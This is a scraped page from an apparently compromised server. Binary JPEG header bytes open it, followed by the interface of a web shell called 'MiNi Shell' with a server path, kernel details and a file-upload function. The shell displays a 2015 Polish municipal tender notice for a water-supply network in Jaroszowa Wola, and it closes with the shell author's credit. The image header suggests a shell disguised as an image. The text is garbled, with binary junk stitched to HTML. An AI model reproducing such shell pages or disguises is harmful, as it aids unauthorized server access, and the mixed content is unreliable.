JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150814/209274-N-2015.html

<p class="kh_header"><b>Prażmów: Budowa sieci wodociągowej w miejscowości Jaroszowa Wola w
ul. Głównej i w ul. Ogrodowej</b><br>
<b>Numer ogłoszenia: 209274 - 2015; data zamieszczenia: 14.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminne Przedsiębiorstwo Wodaciągowo -Kanalizacyjne w Prażmowie , ul.Piotra Czołchańskiego 17/2, 05-505 Prażmów, woj. mazowieckie, tel. 22 736 15 81, faks 22 736 15 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gpwk.prazmow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej w miejscowości Jaroszowa Wola w
ul. Głównej i w ul. Ogrodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa sieci wodociągowej w miejscowości Jaroszowa Wola w ul. Ogrodowej i ul. Głównej.
2. Zamówienie obejmuje:
1) budowę sieci wodociągowej z rur PE  Dz 110 mm o długości 720,00 m,
metodą bezwykopową , przeciskiem kontrolowanym,
3) budowę hydrantów nadziemnych o 80 mm w ilości 5 kpl,
3. Zamówienie obejmuje również:
1) organizację, utrzymanie i zabezpieczenie terenu budowy z zapleczem socjalnym
i technicznym,
2) oznakowanie terenu budowy,
3) zapewnienie bieżącej obsługi geodezyjnej w zakresie wytyczania przez służbę
geodezyjną trasy sieci oraz odtworzenia zniszczonych podczas robót znaków geodezyjnych,
4) opracowanie projektu organizacji ruchu wraz z koniecznymi uzgodnieniami,
5) uzgodnienia z zakresu zajęcia pasa drogowego drogi powiatowej i dróg gminnych
oraz poniesienie opłat za zajęcie pasa drogowego,
6) segregowanie, składowanie i unieszkodliwienie odpadów,
7) dezynfekcję rurociągów,
8) próby szczelności każdej sieci wodociągowej oraz pompowanie próbne pomiarowe
(oczyszczające) sieci kanalizacyjnej,
9) zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów
oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu robot
objętych przedmiotem zamówienia,
10) badania bakteriologiczne wody,
11) odtworzenie nawierzchni, naprawy ewentualnych uszkodzeń urządzeń podziemnych
w obrębie placu budowy i wykonywanych robót,
12) uporządkowanie terenu po budowie,
13) wykonanie geodezyjnej inwentaryzacji powykonawczej,
14) sporządzenie i przedłożenie dokumentacji powykonawczej,
15) oraz wszelkie inne prace określone w projektach budowlanych, specyfikacjach
technicznego wykonania i odbioru robót i przedmiarze robót nie ujęte w niniejszej
SIWZ, a konieczne do wykonania ze względu na sztukę budowlaną.
4. Wykonawca zobowiązany jest do zapoznania się z terenem budowy (wizji w terenie).
5. Oznaczenie CPV:
45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów
do odprowadzania ścieków
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45232100-3 Roboty pomocnicze w zakresie wodociągów
45232440-8 Roboty budowlane w zakresie budowy rurociągów do odprowadzania
ścieków
45112700-2 Roboty w zakresie kształtowania terenu
45231110-9 Roboty budowlane w zakresie kładzenia rurociągów
45231111-6 Podnoszenie i poziomowanie rurociągów
45233142-6 Roboty w zakresie naprawy dróg
6. Szczegółowy zakres robót oraz opis przedmiotu zamówienia określają:
1) projekt budowlany sieci wodociągowej w miejscowości Jaroszowa Wola stanowiący
załącznik nr 9 do SIWZ,,
2) specyfikacja technicznego wykonania i odbioru robót na roboty związane
z wykonaniem sieci wodociągowej w miejscowości Jaroszowa Wola.
stanowiąca załącznik nr 10 do SIWZ,
3) przedmiar robót stanowiący załącznik nr 11 do SIWZ,
4) opinia geotechniczna dla sieci wodociągowej w miejscowości Jaroszowa Wola stanowiąca załącznik nr 12 do SIWZ,
7. Zamawiający informuj, że jeżeli gdziekolwiek przedmiot zamówienia w niniejszym
postępowaniu określony został przez wskazanie znaków towarowych lub nazw
producentów, to ma to jedynie za zadanie sprecyzowanie oczekiwań jakościowych
i technologicznych Zamawiającego. Zamawiający dopuszcza składanie ofert, w których
poszczególne urządzenia bądź materiały wymienione w dokumentacji projektowej
oraz specyfikacji technicznej wykonania i odbioru robót mogą być zastąpione
urządzeniami bądź materiałami równoważnymi. Za urządzenia bądź materiały
równoważne Zamawiający uzna te, które posiadają takie same lub korzystniejsze
parametry techniczne i jakościowe, jakie zostały określone w dokumentacji projektowej
i specyfikacji technicznej wykonania i odbioru robót, a zastosowanie ich w żaden sposób
nie wpłynie na zmniejszenie poziomu technologicznego, wydajnościowego
i gwarancyjnego. Zmiana jest możliwa w przypadku, gdy Wykonawca uzyska pisemną
zgodę Zamawiającego.
8. Zamawiający zastrzega sobie prawo do ustalenia w trakcie realizacji zadania kolejności
wykonania poszczególnych prac.
9. Zamawiający wymaga od Wykonawcy udzielenia gwarancji na zrealizowany przedmiot
zamówienia na okres w przedziale od 36 miesięcy do 60 miesięcy licząc od daty
bezusterkowego odbioru końcowego całego zadania, przy czym minimalny okres
gwarancji wynosi 36 miesięcy a maksymalny okres gwarancji 60 miesięcy.
10. Projekty budowlane, specyfikacje techniczne wykonania i odbioru robót, opinie
geotechniczne w wersji papierowej oraz SIWZ znajduje się w siedzibie Gminnego Przedsiębiorstwa Wodociągowo-Kanalizacyjnego ul. Piotra Czołchańskiego 17/2
 05-505 Prażmów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67
ust. 1 pkt 6 ustawy, do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.21.00-3, 45.23.24.40-8, 45.11.27.00-2, 45.23.11.10-9, 45.23.11.11-6, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wnieść wadium w wysokości 3000,00 zł</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony na podstawie złożonego
oświadczenia w zakresie art. 22 ust. 1 ustawy oraz gdy Wykonawca wykaże,
że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum
dwie roboty budowlane polegające na budowie sieci wodociągowej o długości
minimum 1500,00 mb łącznie.
Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia
na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie
Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie
dokonana na podstawie złożonego oświadczenia w zakresie art. 22 ust. 1 ustawy.
Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia
na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony na podstawie złożonego
oświadczenia w zakresie art. 22 ust. 1 ustawy oraz gdy Wykonawca przedstawi
wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, tj. co najmniej
jedną osobę, która będzie pełnić funkcję kierownika budowy, posiadającą
uprawienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych.
Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca
1994 r. Prawo budowlane (j.t. Dz. U. z 2013 r. poz. 1409 z późn. zm.)
oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006
r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r.
nr 83, poz. 578 z późn. zm.).
Dopuszcza się ważne odpowiadające im uprawnienia nadane na podstawie
wcześniej obowiązujących przepisów. W przypadku wykonawców zagranicznych,
dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach
określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane,
z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach
uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii
Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394 ze zm.).
Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia
na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony na podstawie złożonego
oświadczenia w zakresie art. 22 ust. 1 ustawy oraz gdy Wykonawca posiada
opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający,
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia na wartość
nie mniejszą niż 200.000,00 zł.
Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia
na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści
oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Zmiana treści umowy może nastąpić w następujących przypadkach i na następujących
warunkach:
1) wstrzymanie robót przez właściwy organ z przyczyn nie zawinionych
przez Wykonawcę,
2) wstrzymanie realizacji umowy przez Zamawiającego,
3) działania siły wyższej,
4) wystąpienie warunków atmosferycznych i zdarzeń losowych, które utrudniają
lub uniemożliwiając prowadzenie robót w umówiony sposób,
5) wystąpienie warunków geologicznych, geotechnicznych, hydrologicznych
odbiegających w sposób istotny od przyjętych w dokumentacji projektowej,
wystąpienia znalezisk archeologicznych, nieprzewidzianych kolizji z urządzeniami
infrastruktury,
6) wystąpienie niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi
przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia
tych kolizji,
7) konieczności dokonania zmian w dokumentacji projektowej lub dokumentacji
technicznej urządzeń,
8) wystąpienia w trakcie realizacji umowy konieczności usunięcia drzew
oraz uzyskania stosownych zezwoleń,
9) zmiany będące następstwem działania organów administracji,
10)zastosowania innych niż przewidziane w dokumentacji projektowej lub specyfikacji
technicznego wykonania i odbioru robót technologii, materiałów, urządzeń
lub rozwiązań projektowych i funkcjonalnych w ramach zatwierdzonego projektu
budowlanego,
11)aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,
12)konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań
technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
13)konieczności zmiany osób pełniących samodzielne funkcje techniczne
w budownictwie lub innych osób wyznaczonych do kierowania i nadzorowania
procesu budowlanego,
14)zmiany Podwykonawcy, wskazanego na etapie postępowania o udzielenie zamówienia
publicznego w formularzu ofert stanowiącym załącznik nr 1 do SIWZ,
a jednocześnie będącego podmiotem, na którego zasoby Wykonawca powołał się
na zasadach określonych w art. 26 ust. 2b ustawy, w celu wykazania spełnienia
warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy,
jeśli Wykonawca wykaże Zamawiającemu, iż proponowany inny Podwykonawca
lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu
mniejszym niż wymagane w trakcie przedmiotowego postępowania o udzielenie
zamówienia,
15)zmian dotyczących Podwykonawców poprzez:
a) wskazanie innych Podwykonawców,
b) rezygnację z Podwykonawców,
c) wskazanie innego zakresu podwykonawstwa,
d) wykonania przedmiotu umowy przy pomocy Podwykonawców, pomimo
nie wskazania w ofercie przetargowej żadnej części zamówienia przeznaczonej
do wykonania w ramach podwykonawstwa,
16)zaistnienie konieczności ograniczenia lub rezygnacji z części umownego zakresu robót,
17)zaistnienia konieczności wykonania robót zamiennych,
18)wystąpienia konieczności wykonania zamówień dodatkowych, od których zależy
wykonanie przedmiotu umowy,
19) zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ
na realizację zamówienia, w tym ustawowej zmiany stawki podatku od towarów
i usług (VAT),
20)zmiana danych adresowych lub innych danych dotyczących stron umowy.
3. Dopuszczalny zakres zmian umowy w sprawie zamówienia publicznego obejmuje:
1) możliwość zmiany terminu zakończenia realizacji zamówienia i innych terminów
umownych,
2) możliwości zmiany materiałów, parametrów technicznych i technologii wykonania
robót budowlanych,
3) możliwość zmiany osób uprawnionych do pełnienia samodzielnych funkcji
technicznych w budownictwie lub innych osób wyznaczonych do kierowania
i nadzorowania procesu budowlanego,
4) możliwość zmiany w zakresie podwykonawstwa i umów o podwykonawstwo,
5) możliwość zmiany umówionego wynagrodzenia wynikającej z porównania rozmiaru
i wartości robót zamiennych z robotami pierwotnie zamówionymi z zastrzeżeniem
nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną
kwotę umówionego wynagrodzenia,
6) możliwość zmniejszenia wynagrodzenia umownego poprzez korektę wartości umowy
po cenach i stawkach wynikających z kosztorysu ofertowego Wykonawcy,
7) modyfikację rozmiaru i rodzaju robót w zakresie ustalonych robót zamiennych,
bez możliwości jednak rozszerzenia zakresu zamówienia w związku z zakazem
wynikającym z art. 140 ust. 1 ustawy Prawo zamówień publicznych,
8) możliwość zmiany ceny brutto na wykonanie zamówienia w przypadku zmiany
urzędowej stawki podatku od towarów i usług (VAT),
9) możliwość zmiany danych adresowych stron umowy oraz danych objętych fakturą,
w szczególności numer NIP, numer rachunki bankowego.
4. Zmiany treści niniejszej umowy będą odbywałaby się za zgodą obu stron w formie
pisemnej, pod rygorem nieważności i mogą być dopuszczone tylko w granicach
określonych w niniejszym paragrafie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.prazmow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminne Przedsiębiorstwo Wodociągowo Kanalizacyjne w Prazmowie ul. Czołchańskiego 17/2, 05-505 Prażmów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2015 godzina 11:00, miejsce: Gminne Przedsiębiorstwo Wodociągowo Kanalizacyjne w Prazmowie ul. Czołchańskiego 17/2, 05-505 Prażmów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com